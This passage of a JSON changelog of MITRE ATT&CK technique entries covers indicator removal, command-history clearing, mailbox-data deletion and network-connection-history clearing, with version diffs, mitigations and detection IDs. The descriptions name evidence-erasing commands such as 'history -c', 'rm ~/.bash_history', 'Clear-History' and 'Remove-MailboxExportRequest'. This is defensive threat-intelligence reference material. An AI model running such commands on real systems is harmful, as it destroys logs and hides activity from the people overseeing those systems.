                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:02:58.258000+00:00\", \"old_value\": \"2025-10-24 17:48:27.075000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][6]\": {\"source_name\": \"Autoruns for Windows\", \"description\": \"Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1024: Restrict Registry Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0427: Detection Strategy for Hijack Execution Flow through Service Registry Premission Weakness."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:55.892000+00:00",
                    "modified": "2026-04-15 15:10:02.929000+00:00",
                    "name": "Indicator Removal",
                    "description": "Adversaries may selectively delete or modify artifacts generated to reduce indications of their presence and blend in with legitimate activity. Rather than broadly removing evidence, adversaries may target specific artifacts that appear anomalous or are likely to draw scrutiny, while leaving sufficient data intact to maintain the appearance of normal system behavior.\n\nArtifacts such as command histories, log entries, or file metadata may be altered in ways that align with expected user or system activity. Location, format, and type of artifact (such as command or login history) are often platform-specific, allowing adversaries to tailor modifications that minimize suspicion.\n\nThese actions may not prevent detection entirely but can delay recognition of malicious activity or reduce the fidelity of alerts by making events appear benign or consistent with routine operations. Additionally, selectively removed or modified artifacts may still be recoverable through deeper forensic analysis, though their absence or alteration can complicate timeline reconstruction and attribution.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070",
                            "external_id": "T1070"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Brad Geesaman, @bradgeesaman",
                        "Ed Williams, Trustwave, SpiderLabs",
                        "Blake Strom, Microsoft 365 Defender"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Office Suite",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 15:10:02.929000+00:00\", \"old_value\": \"2025-10-24 17:48:59.237000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may selectively delete or modify artifacts generated to reduce indications of their presence and blend in with legitimate activity. Rather than broadly removing evidence, adversaries may target specific artifacts that appear anomalous or are likely to draw scrutiny, while leaving sufficient data intact to maintain the appearance of normal system behavior.\\n\\nArtifacts such as command histories, log entries, or file metadata may be altered in ways that align with expected user or system activity. Location, format, and type of artifact (such as command or login history) are often platform-specific, allowing adversaries to tailor modifications that minimize suspicion.\\n\\nThese actions may not prevent detection entirely but can delay recognition of malicious activity or reduce the fidelity of alerts by making events appear benign or consistent with routine operations. Additionally, selectively removed or modified artifacts may still be recoverable through deeper forensic analysis, though their absence or alteration can complicate timeline reconstruction and attribution.\", \"old_value\": \"Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary\\u2019s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\\n\\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary\\u2019s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\\n+Adversaries may selectively delete or modify artifacts generated to reduce indications of their presence and blend in with legitimate activity. Rather than broadly removing evidence, adversaries may target specific artifacts that appear anomalous or are likely to draw scrutiny, while leaving sufficient data intact to maintain the appearance of normal system behavior.\\n \\n-Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.\\n+Artifacts such as command histories, log entries, or file metadata may be altered in ways that align with expected user or system activity. Location, format, and type of artifact (such as command or login history) are often platform-specific, allowing adversaries to tailor modifications that minimize suspicion.\\n+\\n+These actions may not prevent detection entirely but can delay recognition of malicious activity or reduce the fidelity of alerts by making events appear benign or consistent with routine operations. Additionally, selectively removed or modified artifacts may still be recoverable through deeper forensic analysis, though their absence or alteration can complicate timeline reconstruction and attribution.\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.4\"}}}",
                    "previous_version": "2.4",
                    "version_change": "2.4 \u2192 3.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to23__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to23__0\"><a href=\"#difflib_chg_to23__top\">t</a></td><td class=\"diff_header\" id=\"from23_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Adversaries&nbsp;may&nbsp;delete&nbsp;or&nbsp;modify&nbsp;artifacts&nbsp;generated&nbsp;within&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to23__top\">t</a></td><td class=\"diff_header\" id=\"to23_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Adversaries&nbsp;may&nbsp;selectively&nbsp;delete&nbsp;or&nbsp;modify&nbsp;artifacts&nbsp;gener</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">systems&nbsp;to&nbsp;remove&nbsp;evidence&nbsp;of&nbsp;their&nbsp;presence&nbsp;or&nbsp;hinder&nbsp;defen</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ated&nbsp;to&nbsp;reduce&nbsp;indications&nbsp;of&nbsp;their&nbsp;presence&nbsp;and&nbsp;blend&nbsp;in&nbsp;wi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ses.&nbsp;Various&nbsp;artifacts&nbsp;may&nbsp;be&nbsp;created&nbsp;by&nbsp;an&nbsp;adversary&nbsp;or&nbsp;som</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">th&nbsp;legitimate&nbsp;activity.&nbsp;Rather&nbsp;than&nbsp;broadly&nbsp;removing&nbsp;evidenc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ething&nbsp;that&nbsp;can&nbsp;be&nbsp;attributed&nbsp;to&nbsp;an&nbsp;adversary\u2019s&nbsp;actions.&nbsp;Typ</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e,&nbsp;adversaries&nbsp;may&nbsp;target&nbsp;specific&nbsp;artifacts&nbsp;that&nbsp;appear&nbsp;ano</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ically&nbsp;these&nbsp;artifacts&nbsp;are&nbsp;used&nbsp;as&nbsp;defensive&nbsp;indicators&nbsp;rela</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">malous&nbsp;or&nbsp;are&nbsp;likely&nbsp;to&nbsp;draw&nbsp;scrutiny,&nbsp;while&nbsp;leaving&nbsp;suffici</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ted&nbsp;to&nbsp;monitored&nbsp;events,&nbsp;such&nbsp;as&nbsp;strings&nbsp;from&nbsp;downloaded&nbsp;fil</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ent&nbsp;data&nbsp;intact&nbsp;to&nbsp;maintain&nbsp;the&nbsp;appearance&nbsp;of&nbsp;normal&nbsp;system&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">es,&nbsp;logs&nbsp;that&nbsp;are&nbsp;generated&nbsp;from&nbsp;user&nbsp;actions,&nbsp;and&nbsp;other&nbsp;dat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">behavior.&nbsp;&nbsp;Artifacts&nbsp;such&nbsp;as&nbsp;command&nbsp;histories,&nbsp;log&nbsp;entries,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">a&nbsp;analyzed&nbsp;by&nbsp;defenders.&nbsp;Location,&nbsp;format,&nbsp;and&nbsp;type&nbsp;of&nbsp;artif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;file&nbsp;metadata&nbsp;may&nbsp;be&nbsp;altered&nbsp;in&nbsp;ways&nbsp;that&nbsp;align&nbsp;with&nbsp;exp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">act&nbsp;(such&nbsp;as&nbsp;command&nbsp;or&nbsp;login&nbsp;history)&nbsp;are&nbsp;often&nbsp;specific&nbsp;to</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ected&nbsp;user&nbsp;or&nbsp;system&nbsp;activity.&nbsp;Location,&nbsp;format,&nbsp;and&nbsp;type&nbsp;of</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;each&nbsp;platform.&nbsp;&nbsp;Removal&nbsp;of&nbsp;these&nbsp;indicators&nbsp;may&nbsp;interfere&nbsp;w</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;artifact&nbsp;(such&nbsp;as&nbsp;command&nbsp;or&nbsp;login&nbsp;history)&nbsp;are&nbsp;often&nbsp;platf</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ith&nbsp;event&nbsp;collection,&nbsp;reporting,&nbsp;or&nbsp;other&nbsp;processes&nbsp;used&nbsp;to&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">orm-specific,&nbsp;allowing&nbsp;adversaries&nbsp;to&nbsp;tailor&nbsp;modifications&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">detect&nbsp;intrusion&nbsp;activity.&nbsp;This&nbsp;may&nbsp;compromise&nbsp;the&nbsp;integrity</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hat&nbsp;minimize&nbsp;suspicion.&nbsp;&nbsp;These&nbsp;actions&nbsp;may&nbsp;not&nbsp;prevent&nbsp;detec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;of&nbsp;security&nbsp;solutions&nbsp;by&nbsp;causing&nbsp;notable&nbsp;events&nbsp;to&nbsp;go&nbsp;unrep</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;entirely&nbsp;but&nbsp;can&nbsp;delay&nbsp;recognition&nbsp;of&nbsp;malicious&nbsp;activit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">orted.&nbsp;This&nbsp;activity&nbsp;may&nbsp;also&nbsp;impede&nbsp;forensic&nbsp;analysis&nbsp;and&nbsp;i</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;or&nbsp;reduce&nbsp;the&nbsp;fidelity&nbsp;of&nbsp;alerts&nbsp;by&nbsp;making&nbsp;events&nbsp;appear&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ncident&nbsp;response,&nbsp;due&nbsp;to&nbsp;lack&nbsp;of&nbsp;sufficient&nbsp;data&nbsp;to&nbsp;determin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">enign&nbsp;or&nbsp;consistent&nbsp;with&nbsp;routine&nbsp;operations.&nbsp;Additionally,&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;what&nbsp;occurred.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">electively&nbsp;removed&nbsp;or&nbsp;modified&nbsp;artifacts&nbsp;may&nbsp;still&nbsp;be&nbsp;recove</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rable&nbsp;through&nbsp;deeper&nbsp;forensic&nbsp;analysis,&nbsp;though&nbsp;their&nbsp;absence</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;alteration&nbsp;can&nbsp;complicate&nbsp;timeline&nbsp;reconstruction&nbsp;and&nbsp;at</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tribution.</span></td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1029: Remote Data Storage",
                            "M1041: Encrypt Sensitive Information"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0184: Behavioral Detection of Indicator Removal Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-31 12:32:08.228000+00:00",
                    "modified": "2026-04-15 20:27:09.604000+00:00",
                    "name": "Clear Command History",
                    "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.  \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/003",
                            "external_id": "T1070.003"
                        },
                        {
                            "source_name": "Broadcom ESXi Shell Audit",
                            "description": "Broadcom. (2025, February 20). Auditing ESXi Shell logins and commands. Retrieved March 26, 2025.",
                            "url": "https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html"
                        },
                        {
                            "source_name": "Sophos PowerShell command audit",
                            "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.",
                            "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit"
                        },
                        {
                            "source_name": "Microsoft PowerShell Command History",
                            "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.",
                            "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"
                        },
                        {
                            "source_name": "US-CERT-TA18-106A",
                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
                        },
                        {
                            "source_name": "Sophos PowerShell Command History Forensics",
                            "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024.",
                            "url": "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Vikas Singh, Sophos",
                        "Emile Kenning, Sophos",
                        "Austin Clark, @c2defense"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:27:09.604000+00:00\", \"old_value\": \"2025-10-24 17:48:40.313000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.6\"}}}",
                    "previous_version": "1.6",
                    "version_change": "1.6 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1029: Remote Data Storage",
                            "M1039: Environment Variable Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0165: Behavioral Detection of Command History Clearing"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-07-08 21:04:03.739000+00:00",
                    "modified": "2026-04-15 20:27:22.074000+00:00",
                    "name": "Clear Mailbox Data",
                    "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code>  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/008",
                            "external_id": "T1070.008"
                        },
                        {
                            "source_name": "Volexity SolarWinds",
                            "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.",
                            "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
                        },
                        {
                            "source_name": "Cybereason Cobalt Kitty 2017",
                            "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
                            "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"
                        },
                        {
                            "source_name": "mailx man page",
                            "description": "Michael Kerrisk. (2021, August 27). mailx(1p) \u2014 Linux manual page. Retrieved June 10, 2022.",
                            "url": "https://man7.org/linux/man-pages/man1/mailx.1p.html"
                        },
                        {
                            "source_name": "ExchangePowerShell Module",
                            "description": "Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.",
                            "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes"
                        },
                        {
                            "source_name": "Microsoft OAuth Spam 2022",
                            "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:27:22.074000+00:00\", \"old_value\": \"2025-04-15 21:56:59.810000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1029: Remote Data Storage",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0266: Behavioral Detection of Mailbox Data and Log Deletion for Anti-Forensics"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-06-15 18:00:04.219000+00:00",
                    "modified": "2026-04-16 19:27:07.242000+00:00",
                    "name": "Clear Network Connection History and Configurations",
                    "description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\n\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers</code>\n\nWindows may also store information about recent RDP connections in files such as <code>C:\\Users\\\\%username%\\Documents\\Default.rdp</code> and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\nServer Client\\Cache\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable 